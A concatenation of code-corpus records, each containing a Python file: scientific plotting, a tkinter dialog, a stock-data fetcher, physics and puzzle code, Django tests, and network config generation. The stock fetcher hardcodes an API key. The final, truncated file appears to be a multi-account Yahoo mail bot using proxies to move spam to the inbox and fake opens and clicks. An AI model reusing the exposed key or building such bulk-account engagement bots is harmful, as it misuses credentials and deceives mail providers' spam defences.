-108,-88,-73,-65\r\nz = ['Chlorophyll A','Pheophorbide A','Pheophytin A','Fucoxanthin','19-hex',\r\n 'Alloxanthin','Peridinin','Chlorophyll B'] #色素列名\r\ntext = ['Chlorophyll a/mg·$\\mathregular{m^{-2}}$',\r\n 'Pheophorbide a/mg·$\\mathregular{m^{-2}}$',\r\n 'Pheophytin a/mg·$\\mathregular{m^{-2}}$',\r\n 'Fucoxanthin/mg·$\\mathregular{m^{-2}}$',\r\n \"19'-hexanoyloxyfucoxanthin/mg·$\\mathregular{m^{-2}}$\",\r\n 'Alloxanthin/mg·$\\mathregular{m^{-2}}$',\r\n 'Peridinin/mg·$\\mathregular{m^{-2}}$',\r\n 'Chlorophyll b/mg·$\\mathregular{m^{-2}}$'] #题名\r\nindex,column = 
[4,2] #行和列的数量 【2*2 也可,z和title列数量(4)对应就好】\r\nfig_dir = 'D:/Refresh/data/CHINARE-35/pic/特征色素积分分布-english.png' #图片保存路径\r\n\r\nplt.rcParams['font.sans-serif']=['Times New Roman'] \r\nfig = plt.figure()\r\nplt.rcParams['figure.figsize'] = (10,10)\r\nplt.subplots_adjust(wspace=0.01,hspace=0.1)\r\n\r\nimage = support_pie.loadtif()\r\nnum = 0\r\nfor i in range(index):\r\n for j in range(column):\r\n plt.subplot(index,column,num+1)\r\n plt.gca().xaxis.set_ticks_position('top') \r\n plot(z[num],df,image)\r\n plt.text(-90,-66,support_pie.getChar(num),fontdict=fontsize)\r\n plt.text(-107.7,-66.5,s=text[num],fontdict=fontsize)\r\n\r\n# plt.text(char_x,char_y,support_pie.getChar(num),\r\n# fontdict=fontsize)\r\n if i != 0 :\r\n plt.xticks(())\r\n if j != 0:\r\n plt.yticks(())\r\n num += 1\r\n \r\nplt.savefig(fig_dir,bbox_inches='tight',dpi=1000,pad_inches=0.1)\r\nplt.show()\r\n\r\n###积分chla 分布\r\n#plt.rcParams['figure.figsize'] = (11,6)\r\n#plot('tchla',df,image)\r\n#plt.text(x,y,s='Chlorophyll a/μg·$\\mathregular{m^{-2}}$',\r\n# fontdict=fontsize)\r\n#plt.gca().xaxis.set_ticks_position('top')\r\n#plt.text(-46,-59.5,'f',fontdict=fontsize)\r\n#plt.savefig('D:/Refresh/data/CHINARE-32/pic/CHEMTAX藻种分布/chla积分分布.png',\r\n# bbox_inches='tight',dpi=1000,pad_inches=0.1)","sub_path":"CHINARE-35阿蒙森海东侧海域/图4-3 叶绿素a及其降解产物及特征色素积分浓度分布图.py","file_name":"图4-3 叶绿素a及其降解产物及特征色素积分浓度分布图.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5822910","text":"#!/usr/bin/python3\n#-----------------------------------------------------------------------------\n# project: tkinterlite\n# authors: 1966bc\n# mailto: [giuseppe.costanzi@gmail.com]\n# modify: 10/04/2017\n# version: 0.1 \n#-----------------------------------------------------------------------------\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nclass Dialog(Toplevel): \n def __init__(self,parent,engine,index=None):\n super().__init__(name='category')\n \n self.resizable(0,0)\n self.parent = parent\n self.engine = engine\n self.index = index\n \n self.enable = BooleanVar()\n\n self.center_me()\n self.init_ui()\n\n def center_me(self):\n\n #center window\n x = (self.master.winfo_screenwidth() - self.master.winfo_reqwidth()) / 2\n y = (self.master.winfo_screenheight() - self.master.winfo_reqheight()) / 2\n self.master.geometry(\"+%d+%d\" % (x, y))\n \n def init_ui(self):\n\n self.panel = self.engine.get_panel_frame(self)\n self.panel.grid(row = 0, column = 0, sticky=N+W+S+E)\n\n Label(self.panel, text=\"Category:\",anchor='w').grid(row=0, sticky='w')\n self.txtCategory = Entry(self.panel,)\n self.txtCategory.grid(row=0, column=1, sticky='w')\n\n Label(self.panel, text=\"Description:\",anchor='w').grid(row=1, sticky='w')\n self.txtDescription = Entry(self.panel,)\n self.txtDescription.grid(row=1, column=1, sticky='w')\n\n Label(self.panel, text=\"Enable:\").grid(row=2, sticky='w')\n self.ckEnable = Checkbutton(self.panel, onvalue=1, offvalue=0, variable = self.enable,)\n self.ckEnable.grid(row=2, column=1, sticky='w')\n\n self.engine.get_save_cancel(self, self)\n \n\n def on_open(self, selected_category = None):\n\n if selected_category is not None:\n self.insert_mode = False\n self.selected_category = selected_category\n msg = \"Update %s\" % (self.selected_category[1],)\n self.set_values()\n else:\n self.insert_mode = True\n msg = \"Insert new category\"\n self.enable.set(1)\n\n self.title(msg)\n self.txtCategory.focus()\n \n def 
on_save(self, evt):\n\n if self.on_fields_control()==False:\n\n msg = \"Please fill all fields.\"\n messagebox.showwarning(self.engine.title,msg)\n\n else:\n \n if messagebox.askyesno(self.engine.title, \"Do you want to save?\",parent=self) == True:\n\n args = self.get_values()\n\n if self.insert_mode == False:\n\n sql = self.engine.get_update_sql('categories','category_id')\n\n args = self.engine.get_update_sql_args(args, self.selected_category[0])\n \n elif self.insert_mode == True:\n\n sql = self.engine.get_insert_sql('categories',len(args))\n\n self.engine.write(sql,args)\n self.parent.on_open()\n\n if self.index is not None:\n self.parent.lstCategories.see(self.index)\n self.parent.lstCategories.selection_set(self.index)\n \n self.on_cancel()\n\n else:\n msg = \"Operation aborted.\"\n messagebox.showinfo(self.engine.title,msg) \n \n def on_cancel(self, evt=None):\n self.destroy()\n\n def get_values(self,):\n\n return (self.txtCategory.get(),\n self.txtDescription.get(),\n self.enable.get())\n \n def set_values(self,):\n\n self.txtCategory.insert(0, self.selected_category[1])\n self.txtDescription.insert(0, self.selected_category[2])\n self.enable.set(self.selected_category[3])\n\n def on_fields_control(self):\n\n objs = (self.txtCategory,self.txtDescription)\n\n for obj in objs:\n if not obj.get():\n ret = False\n break \n else:\n ret = True\n return ret \n \n","sub_path":"frames/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"449412483","text":"from alpha_vantage.timeseries import TimeSeries\nimport pickle \nimport numpy as np \nimport pandas as pd\nimport time\nimport glob\n\n# ts = TimeSeries(key='2N7U5OBZO5MQT4IL',output_format = 'pandas')\n# # Get json object with the intraday data and another with the call's metadata\n# data, meta_data = ts.get_daily_adjusted('GOOGL', outputsize='compact')\n\n# print(data.columns)\n#print(data['6. volume'])\n\n### Plan ; ^GSPC \n # for every tick in Nasdaq\n # get : [adj_close,volume]\n # [adj_open, volume]\n # save to text file \n\ndef save_NSDAQ():\n # ticks : \n ticks = pd.read_csv('../stock_data/constituents_csv.csv')\n\n donefiles = glob.glob('../stock_data/NASDAQ/*')\n done_ticks = [f.split('/')[-1] for f in donefiles]\n not_working = ['BF.B','CA','CSRA','DPS','EVHC','GGP','LLL','MON','NFX','PX']\n print(len(done_ticks))\n\n for tck in ticks.Symbol.values:\n if tck not in done_ticks and tck not in not_working:\n print(tck)\n ts = TimeSeries(key='2N7U5OBZO5MQT4IL',output_format = 'pandas')\n # Get json object with the intraday data and another with the call's metadata\n data,_ = ts.get_daily_adjusted(tck, outputsize='full')\n tosave = data[['5. adjusted close', '6. 
volume']]\n np.savetxt('../stock_data/NASDAQ/' + tck,tosave)\n time.sleep(10)\n\nsave_NSDAQ()","sub_path":"Tryout_notebook/get_stoks.py","file_name":"get_stoks.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"331010880","text":"'''\nCreated on Jan 15, 2013\n\n@author: v-honzha\n'''\n\nclass switch:\n level = 0\n number = 0\n uplink = []\n downlink = []\n def __init__(self, level, number, downlink, uplink):\n self.level = level\n self.number = number\n self.uplink = uplink\n self.downlink = downlink\n\n\n# init switches\nfs01 = [switch(0, 0, range(3), range(12, 15)), \n switch(0, 1, range(3,6), range(15, 18)),\n switch(0, 2, range(6,9), range(18, 21)),\n switch(0, 3, range(9,12), range(21, 24))]\n\nfs02 = [switch(1, 5, range(15, 18), range(21, 24)), \n switch(1, 11, range(12, 15), range(18, 21)),\n switch(1, 16, range(0, 3), range(3, 6)),\n switch(1, 17, range(6, 9), range(9, 12))]\n\nfs03 = [switch(1, 0, range(3), range(12, 15)), \n switch(1, 2, range(6,9), range(18, 21)),\n switch(1, 3, range(9,12), range(21, 24)),]\n\nfs04 = [switch(0, 6, range(3), range(12, 15)), \n switch(0, 7, range(3,6), range(15, 18)),\n switch(0, 8, range(6,9), range(18, 21)),\n switch(0, 9, range(9,12), range(21, 24))]\n\nfs05 = [switch(0, 4, [16, 12, 13], [14, 15, 17]), \n switch(0, 5, range(18,21), range(21, 24)),\n switch(0, 10, range(3), range(6, 9)),\n switch(0, 11, range(3, 6), range(9, 12))]\n\nfs06 = [switch(1, 6, range(3), range(12, 15)), \n switch(1, 7, range(3,6), range(15, 18)),\n switch(1, 8, range(6,9), range(18, 21)),\n switch(1, 9, range(9,12), range(21, 24))]\n\nfs07 = [switch(0, 12, range(3), range(12, 15)), \n switch(0, 13, range(3,6), range(15, 18)),\n switch(0, 14, range(6,9), range(18, 21)),\n switch(0, 15, range(9,12), range(21, 24))]\n\nfs08 = [switch(0, 16, range(3), range(6, 9)), \n switch(0, 17, range(3,6), range(9, 12))]\n\nfs09 = [switch(1, 12, range(3), range(12, 15)), \n switch(1, 13, range(3,6), range(15, 18)),\n switch(1, 14, range(6,9), range(18, 21)),\n switch(1, 15, range(9,12), range(21, 24))]\n\nfs10 = [switch(1, 1, range(3), range(3,6)), \n switch(1, 4, range(6,9), range(9,12)),\n switch(1, 10, range(12,15), range(15,18)),\n switch(2, 3, range(18, 24), [])]\n\ncs02 = [switch(2, 4, range(6), []),\n switch(2, 5, range(6,12), []),\n switch(2, 6, range(12,18), []),\n switch(2, 7, range(18,24), []),\n switch(2, 8, range(24,30), []),\n switch(2, 1, [30,31,32,36,37,38], []),\n switch(2, 2, [33,34,35,39,40,41], []),\n switch(2, 0, range(42,48), []),\n ]\n\nphy_switches = [(fs01, \"fs01\"), (fs02, \"fs02\"), (fs03, \"fs03\"), (fs04, \"fs04\"), (fs05, \"fs05\"), \n (fs06, \"fs06\"), (fs07, \"fs07\"), (fs08, \"fs08\"), (fs09, \"fs09\"), (fs10, \"fs10\")]\n\nserver_mac = \"00:00:01:01:01:01\"\ntor_mac = \"00:00:01:01:01:02\"\nfor phy, phy_name in phy_switches:\n for vrf_id in range(1, len(phy) + 1):\n sw = phy[vrf_id - 1]\n if sw.level == 0: #tor switch\n f = open(\"data/hydrap-tor-{0}-1.soc\".format(sw.number), \"w\")\n \n for l in sw.downlink:\n f.write(\"vlan create {vlan_id} pbm=cpu0,ge{port_id} ubm=ge{port_id}\\n\".\\\n format(vlan_id=l+1024, port_id=l))\n f.write(\"pvlan set ge{port_id} {vlan_id}\\n\".format(port_id=l, vlan_id=l+1024))\n f.write(\"l3 intf add vlan={vlan_id} mac={mac} intf={intf_id} vrf={vrf_id}\\n\".\\\n format(vlan_id=l+1024, mac=tor_mac, intf_id=l+1, vrf_id=vrf_id))\n f.write(\"\\n\")\n \n for l in sw.uplink:\n f.write(\"vlan create {vlan_id} pbm=cpu0,ge{port_id} 
ubm=ge{port_id}\\n\".\\\n format(vlan_id=l+1024, port_id=l))\n f.write(\"pvlan set ge{port_id} {vlan_id}\\n\".format(port_id=l, vlan_id=l+1024))\n f.write(\"l3 intf add vlan={vlan_id} mac={mac} intf={intf_id} vrf={vrf_id}\\n\".\\\n format(vlan_id=l+1024, mac=tor_mac, intf_id=l+1, vrf_id=vrf_id))\n f.write(\"\\n\")\n \n for dl in sw.downlink:\n f.write(\"l3 egress add mac={mac} intf={intf_id} port=ge{port_id}\\n\".\\\n format(mac=server_mac, intf_id=dl+1, port_id=dl))\n f.write(\"\\n\")\n \n for i in range(len(sw.downlink)):\n dl = sw.downlink[i]\n f.write(\"l3 l3table add vrf={vrf_id} ip={ip} intf={egress_id}\\n\".\\\n format(vrf_id=vrf_id, \\\n ip=\"10.11.{pod_id}.{index}\".format\\\n (pod_id=sw.number, index=i+2), egress_id=(vrf_id-1)*3+100002+i))\n f.close() \n \n","sub_path":"switchConfiguration/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"43172517","text":"\"\"\"\nCreated on Feb 11, 2015\n\n@author: Jason Bowles\n\"\"\"\nfrom rawdata_emca.runner.config_file_reader import ConfigFileReader\nfrom rawdata_emca import Base_Type\nimport os\nimport sys\nimport traceback\n\nclass RawProcessor(Base_Type):\n \"\"\"\n The raw processor is the entry point into the framework\n \n All directories and parameters that need to be processed should be passed in on instantiation\n \n params['files'] should be a list of config files that should be processed; each will be added\n params['file'] gives the option to just add 1 file to be processed\n params['run_date'] optional parameter to define the actual run date of the framework (allow past date processing)\n params['log_file'] lists the file to be used for logging of the framework\n \n this class will then setup logging for the remainder of the run\n \"\"\"\n \n config_files = []\n config_entries = []\n run_date = None\n\n def __init__(self, params):\n \"\"\"\n Constructor\n \"\"\"\n Base_Type.__init__(self)\n self.print_only = False\n if params:\n if 'files' in params:\n self.addall_config_files(params['files'])\n if 'file' in params:\n self.add_config_file(params['file'])\n if 'run_date' in params:\n self.run_date = params['run_date']\n if params.get('print_only',False):\n self.print_only = True\n \n self.force_name = params.get('force',None)\n if 'log_file' in params:\n directory = os.path.dirname(os.path.realpath(params['log_file']))\n if not os.path.exists(directory):\n os.makedirs(directory)\n self.log_file = params['log_file']\n else:\n run_path = os.path.dirname(os.path.realpath(sys.argv[0]))\n directory = os.path.join(run_path,'log')\n if not os.path.exists(directory):\n os.makedirs(directory)\n self.log_file = os.path.join(directory,'rawdata.log')\n \n self.setup_logging()\n self.log_message(\"Kicking Off Raw Data Processor\", log_type='main', status='start', step='root', name='raw_processor')\n \n \n \n def prep_reader(self):\n params = {}\n #params['uuid'] = self.log_uuid\n if self.run_date:\n params['run_date'] = self.run_date\n if self.force_name:\n params['entry_name'] = self.force_name\n reader = ConfigFileReader(params)\n self.log_message(\"Begin Processing Config Files\",status='running')\n for f in self.config_files:\n reader.process_config(f)\n \n return reader\n \n def execute_entries(self):\n final_stat = 0\n try: \n self.log_message(\"About to Prep the Reader\", log_level=self.log_info(),status='start',step='load configs')\n reader = self.prep_reader()\n self.log_message(\"Reader Prepped\", 
status='complete')\n final_stat = reader.execute_entries(print_order=self.print_only)\n self.log_message('Raw Data Processor has Finished (Number of Failed Entries: {})'.format(final_stat),log_type='main',status='complete',step='root',name='raw_processor',log_level=self.log_debug())\n except Exception as err1:\n step = 'entry loading'\n if self.log_status == 'complete':\n step = 'entry executing'\n self.log_message('Problem while running: ' + str(err1) + ', issue found in: ('+step+')',log_level=self.log_error(),name='raw_processor',status='error')\n traceback.print_exc()\n return final_stat\n \n def execute_single_entry(self, entry_name):\n reader = self.prep_reader()\n return reader.execute_entry(entry_name)\n \n def addall_config_files(self,files):\n if files:\n for f in files:\n self.add_config_file(f)\n \n def add_config_file(self, filename):\n if filename:\n self.config_files.append(filename)","sub_path":"rawdata_emca/runner/raw_processor.py","file_name":"raw_processor.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"581275615","text":"#Exercise 3\n\n#write a program that prints out all the elements of the list that are less than 5.\n\n#Extras:\n#1. Instead of printing the elements one by one, make a new list that has all the elements less than 5 from this list in it and print out this new list.\n#2. Write this in one line of Python.\n#3. Ask the user for a number and return a list that contains only elements from the original list a that are smaller than that number given by the user.\n\n#create lists\nsourcelist = [1 ,1 ,2 ,3 ,5 ,8 ,13 ,21 ,34 ,55 ,89]\nnewlist = []\n\n#insert elements less than 5 from sourcelist into newlist using a list comprehension\nnewlist = [element for element in sourcelist if element < 5]\n \nprint(newlist)\n\n#clear newlist\nnewlist.clear()\n\n#insert elements less than a given number from sourcelist into newlist using a list comprehension\nnum = int(input(\"Please insert a number: \"))\n\nnewlist = [element for element in sourcelist if element < num]\n\nprint(\"This is a list of elements that are less than \" + str(num) + \" : \" + str(newlist))\n","sub_path":"exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"512780321","text":"import numpy as np\n\ndefaultMF_amp = 0.44\ndefaultMF_power = 0.51\ndefaultCSF_amp = 0.50\ndefaultCSF_power = 0.45\ndefaultCSF_max = 3\ndefaultq_power = -0.4\ndefaultq_min = 0.01\ndefault_aMean = 100.0 # log (AU)\ndefault_aSigma = 0.1 # log (AU)\n\n# Eventually we should add in separation properties. (a_mean, a_sigma)\n\nclass MultiplicityUnresolved(object):\n def __init__(self, \n MF_amp=0.44, MF_power=0.51,\n CSF_amp=0.50, CSF_power=0.45, CSF_max=3,\n q_power=-0.4, q_min=0.01):\n \"\"\"\n The properties of stellar companions.\n\n The number of stellar companions, their masses, and separations\n can be described by the following functions:\n\n Multiplicity Fraction -- the number of stellar systems that host \n multiple stars. In other words, the number of primary stars with\n companions. 
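(With the default parameters below, for example, MF(1.0) = MF_amp = 0.44, since 1.0 ** MF_power == 1.)\n 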
The multiplicity fraction (MF) is typically described\n as: \n B + T + Q + ...\n MF = ---------------------\n S + B + T + Q + ...\n\n where S = single, B = binary, T = triple, Q = quadruple, etc.\n The MF also changes with mass and this dependency can be \n described as a power-law:\n \n `MF(mass) = MF_amp * (mass ** MF_power)`\n\n Companion Star Fraction -- the expected number of companions in\n a multiple system. The companion star fraction (CSF) also \n changes with mass and this dependency can be described as\n a power-law:\n \n `CSF(mass) = CSF_amp * (mass ** CSF_power)`\n\n The companion star fraction is clipped to some maximum\n value, CSF_max. The actual number of companions is drawn \n from a Poisson distribution with an expectation value of CSF.\n\n Mass Ratio (Q) -- The ratio between the companion star \n mass and primary star mass, Q = (m_comp / m_prim) has\n a probability density function described by a power-law:\n\n `P(Q) = Q ** q_power` for q_min <= Q <= 1\n\n Current observations show no significant mass dependence.\n\n Parameters\n ----------\n MF_amp : float\n The amplitude of the power-law describing the Multiplicity \n Fraction as a function of stellar mass. \n\n MF_power : float\n The power of the power-law describing the Multiplicity\n Fraction as a function of stellar mass.\n\n CSF_amp : float\n The amplitude of the power-law describing the companion star \n fraction as a function of stellar mass.\n\n CSF_power : float\n The power of the power-law describing the companion star \n fraction as a function of stellar mass.\n\n CSF_max : float\n The maximum allowed companion star fraction, which is the\n expectation value for the number of companion stars. Given\n a CSF_max = 3, some systems will still have more than 3 \n companions.\n\n q_power : float\n The power of the power-law describing the probability\n density function for the mass ratio.\n\n q_min : float\n The minimum allowed Q value for the probability\n density function of the mass ratio.\n \"\"\"\n \n self.MF_amp = MF_amp\n self.MF_pow = MF_power\n self.CSF_amp = CSF_amp\n self.CSF_pow = CSF_power\n self.CSF_max = CSF_max\n self.q_pow = q_power\n self.q_min = q_min\n\n def multiplicity_fraction(self, mass):\n \"\"\"\n Given a star's mass, determine the probability that the star is in a\n multiple system (multiplicity fraction = MF).\n\n Parameters\n ----------\n mass : float or numpy array\n Mass of primary star.\n\n Return\n ------\n mf : float or numpy array\n Multiplicity Fraction, the fraction of stars at this mass\n that will have one or more companions.\n \"\"\"\n # Multiplicity Fraction\n mf = self.MF_amp * mass ** self.MF_pow\n\n # Clip to 1; a scalar cannot be clipped with boolean indexing.\n if np.isscalar(mf):\n mf = min(mf, 1)\n else:\n mf[mf > 1] = 1\n\n return mf\n\n def companion_star_fraction(self, mass):\n \"\"\"\n Given a star's mass, determine the average number of\n companion stars (companion star fraction = CSF).\n\n Parameters\n ----------\n mass : float or numpy array\n Mass of primary star\n\n Return\n ------\n csf : float or numpy array\n Companion Star Fraction, the expected number of companions\n for a star at this mass.\n \"\"\"\n # Companion Star Fraction\n csf = self.CSF_amp * mass ** self.CSF_pow\n \n # Clip to CSF_max; a scalar cannot be clipped with boolean indexing.\n if np.isscalar(csf):\n csf = min(csf, self.CSF_max)\n else:\n csf[csf > self.CSF_max] = self.CSF_max\n\n return csf\n\n def random_q(self, x):\n \"\"\"\n Generative function for companion mass ratio, equivalent\n to the inverse of the CDF.\n\n `q = m_companion / m_primary`\n `P(q) = q ** beta` for q_min <= q <= 1\n\n Parameters\n 
----------\n x : float or array_like\n Random number between 0 and 1.\n\n Return\n -------\n q : float or array_like\n companion mass ratio(s)\n \"\"\"\n b = 1.0 + self.q_pow\n q = (x * (1.0 - self.q_min ** b) + self.q_min ** b) ** (1.0 / b)\n\n return q\n\n def random_is_multiple(self, x, MF):\n return x < MF\n\n def random_companion_count(self, x, CSF, MF):\n n_comp = 1 + np.random.poisson((CSF / MF) - 1)\n\n return n_comp\n","sub_path":"popstar/imf/multiplicity.py","file_name":"multiplicity.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"2975570","text":"from mixer.backend.django import mixer\nfrom sports.models import Sport, Sporttype\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n\ndef test_sporttype_string():\n \"\"\"\n Test Sporttype string\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n assert str(sporttype) == f'{sporttype.title}'\n\n\ndef test_sport_types_added():\n \"\"\"\n Test Sporttype can be added to DB\n \"\"\"\n mixer.blend(Sporttype)\n mixer.blend(Sporttype)\n assert len(Sporttype.objects.all()) == 2\n\n\ndef test_sport_types_added_is_published():\n \"\"\"\n Test Sporttype is not published by default\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n assert sporttype.is_published is False\n\n\ndef test_sport_can_be_added(create_test_user):\n \"\"\"\n Test Sport can be added for Profile\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n user = create_test_user()\n Sport.objects.create(\n profile=user.profile, sporttype=sporttype, level=3)\n\n assert len(Sporttype.objects.all()) == 1\n assert len(User.objects.all()) == 1\n assert len(Sport.objects.all()) == 1\n\n\ndef test_sport_string(create_test_user):\n \"\"\"\n Test Sport string\n \"\"\"\n sporttype = mixer.blend(Sporttype)\n user = create_test_user()\n sport = Sport.objects.create(\n profile=user.profile, sporttype=sporttype, level=3)\n assert str(sport) == f'{sport.profile} - {sport.sporttype} - {sport.level}'\n","sub_path":"backend/sports/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385606929","text":"\"\"\"\n@@@@@@@@@@@@@@@@@@@@\n@ Peculiar Balance @\n@@@@@@@@@@@@@@@@@@@@\n\nCan we save them? Beta Rabbit is trying to break into a lab that contains the\nonly known zombie cure - but there's an obstacle. The door will only open if a\nchallenge is solved correctly. The future of the zombified rabbit population is\nat stake, so Beta reads the challenge: There is a scale with an object on the\nleft-hand side, whose mass is given in some number of units.\n\nPredictably, the task is to balance the two sides.\nBut there is a catch: You only have this peculiar weight set,\nhaving masses 1, 3, 9, 27, ... units. That is, one for each power of 3.\n\nBeing a brilliant mathematician, Beta Rabbit quickly discovers that any number\nof units of mass can be balanced exactly using this set. To help Beta get into\nthe room, write a method called answer(x), which outputs a list of strings\nrepresenting where the weights should be placed, in order for the two sides to\nbe balanced, assuming that weight on the left has mass x units.\n\nThe first element of the output list should correspond to the 1-unit weight,\nthe second element to the 3-unit weight, and so on. 
Each string is one of:\n\n\"L\" : put weight on left-hand side\n\"R\" : put weight on right-hand side\n\"-\" : do not use weight\n\nTo ensure that the output is the smallest possible, the last element of the list\nmust not be \"-\". x will always be a positive integer, no larger than 1000000000.\n\"\"\"\n\n# Balanced ternary is a non-standard positional numeral system (a balanced form), useful for comparison logic.\n\ndef inc_one_digit(n):\n if n == 'L':\n return False, '-'\n elif n == '-':\n return False, 'R'\n elif n == 'R':\n return True, 'L'\n\ndef dec_one_digit(n):\n if n == 'L':\n return True, 'R'\n elif n == '-':\n return False, 'L'\n elif n == 'R':\n return False, '-'\n\ndef number(A):\n s = ['-'] # 0\n for _ in xrange(A):\n s = increase(s)\n return s\n\ndef evaluate(A):\n s = 0\n for i, x in enumerate(A):\n s += 3**i * ({'L': -1, '-': 0, 'R': 1}[x])\n return s\n\ndef increase(A):\n B = []\n c = True\n for x in A:\n if c:\n c, x = inc_one_digit(x)\n B.append(x)\n if c:\n B.append('R')\n return B\n\ndef add_one_digit(A, B):\n if A == 'L' and B == 'L':\n return -1, 'R'\n elif A == 'L' and B == '-':\n return 0, 'L'\n elif A == 'L' and B == 'R':\n return 0, '-'\n elif A == '-' and B == 'L':\n return 0, 'L'\n elif A == '-' and B == '-':\n return 0, '-'\n elif A == '-' and B == 'R':\n return 0, 'R'\n elif A == 'R' and B == 'L':\n return 0, '-'\n elif A == 'R' and B == '-':\n return 0, 'R'\n elif A == 'R' and B == 'R':\n return 1, 'L'\n\ndef trim(A):\n for i in range(len(A)):\n if A[len(A)-i-1] != '-':\n return A[:len(A)-i]\n return A\n\ndef add(A, B):\n l = max(len(A), len(B)) + 1\n A = list(A) + (['-' for _ in xrange(l-len(A))])\n B = list(B) + (['-' for _ in xrange(l-len(B))])\n C = ['-' for _ in xrange(l)]\n c = 0\n for x in xrange(l):\n c, v = add_one_digit(A[x], B[x])\n cc, v = add_one_digit(v, C[x])\n c += cc\n C[x] = v\n if c < 0:\n while c < 0:\n x += 1\n cc, v = dec_one_digit(C[x])\n c += 1\n C[x] = v\n if cc: c -= 1\n elif c > 0:\n while c > 0:\n x += 1\n cc, v = inc_one_digit(C[x])\n c -= 1\n C[x] = v\n if cc: c += 1\n return trim(C)\n\ndef ten_to_the_nth(x):\n A = number(1)\n B = ['-']\n for _ in xrange(x):\n for _ in xrange(10):\n B = add(A, B)\n A = B\n B = ['-']\n return A\n\ndef answer(x):\n n = 0\n S = ['-']\n while x:\n A = x % 10\n ten = ten_to_the_nth(n)\n for _ in xrange(A):\n S = add(S, ten)\n x -= A\n x = x / 10\n n += 1\n return S\n","sub_path":"combinatorics/peculiar_balance.py","file_name":"peculiar_balance.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"139959319","text":"import os\nimport csv\nimport click\nimport random\nfrom enum import Enum\n\nfrom app import app_settings\n\nclass Singleton:\n\tdef __init__(self, cls):\n\t\tself._cls = cls\n\n\tdef get_instance(self):\n\t\ttry:\n\t\t\treturn self._instance\n\t\texcept AttributeError:\n\t\t\tself._instance = self._cls()\n\n\t\treturn self._instance\n\n\tdef __call__(self):\n\t\traise TypeError('Singletons must be accessed through `get_instance()`.')\n\n\tdef __instancecheck__(self, inst):\n\t\treturn isinstance(inst, self._cls)\n\n\ndef get_profiles_paths():\n\treturn [\n os.path.join(app_settings.FIREFOX_PROFILES_PATH, d) for d in os.listdir(app_settings.FIREFOX_PROFILES_PATH)\n if os.path.isdir(os.path.join(app_settings.FIREFOX_PROFILES_PATH, d))\n and 'default' not in d\n ]\n\n\nclass Profile:\n\tdef __init__(self, email, password, proxy=None):\n\t\tself.email = email\n\t\tself.password = 
password\n\t\tself.proxy = proxy\n\n\tdef __repr__(self):\n\t\treturn f'<Profile {self.email}>'\n\nclass List:\n\tdef __init__(self):\n\t\tself.profiles = None\n\n\nclass Proxy:\n\tdef __init__(self, ip, port=app_settings.DEFAULT_PORT):\n\t\tself.ip = ip\n\t\tself.port = port\n\n\tdef __repr__(self):\n\t\treturn f'<Proxy {self.ip}:{self.port}>'\n\n\nclass Actions(Enum):\n\tSPAM_REPORT_ALL_TO_INBOX\t\t= 0\n\tINBOX_SELECT_ALL_MARK_AS_READ\t= 1\n\tSPAM_SELECT_ALL_MARK_AS_READ\t= 2\n\tINBOX_ARCHIVE_ALL\t\t\t\t= 3\n\tINBOX_OPEN_MESSAGES\t\t\t\t= 4\n\tSPAM_OPEN_MESSAGES\t\t\t\t= 5\n\tINBOX_OPEN_PLUS_CLICK_MESSAGES\t= 6\n\n\ndef load_profiles_from_csv():\n\tprofiles_list = []\n\twith open(app_settings.ACCOUNTS_FILE) as f:\n\t\treader = csv.DictReader(f)\n\t\tfor line in reader:\n\t\t\t# create profile, proxy.\n\t\t\tproxy = None\n\t\t\tif line['proxy']:\n\t\t\t\tparts = line['proxy'].split(':')\n\t\t\t\tif len(parts) == 2:\n\t\t\t\t\tip, port = parts\n\t\t\t\t\tproxy = Proxy(ip, port)\n\t\t\t\telse:\n\t\t\t\t\tproxy = Proxy(parts[0])\n\n\t\t\tif proxy:\n\t\t\t\tprofile = Profile(line['email'], line['password'], proxy)\n\t\t\telse:\n\t\t\t\tprofile = Profile(line['email'], line['password'])\n\t\t\tprofiles_list.append(profile)\n\treturn profiles_list\n\n\ndef show_introduction():\n\tintroduction = f\"\"\"\n+----------------------------------------------------------------------------+\n| |\n| ██╗ ██╗ █████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ████████╗ |\n| ╚██╗ ██╔╝██╔══██╗██║ ██║██╔═══██╗██╔═══██╗ ██╔══██╗██╔═══██╗╚══██╔══╝ |\n| ╚████╔╝ ███████║███████║██║ ██║██║ ██║ ██████╔╝██║ ██║ ██║ |\n| ╚██╔╝ ██╔══██║██╔══██║██║ ██║██║ ██║ ██╔══██╗██║ ██║ ██║ |\n| ██║ ██║ ██║██║ ██║╚██████╔╝ ╚██████╔╝ ██████╔╝╚██████╔╝ ██║ |\n| ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ |\n| |\n| |\n| {app_settings.APP_NAME} v{app_settings.APP_VERSION} Developed By: {app_settings.DEVELOPED_BY} |\n| |\n| Powered By: Omega Capital. Contact: 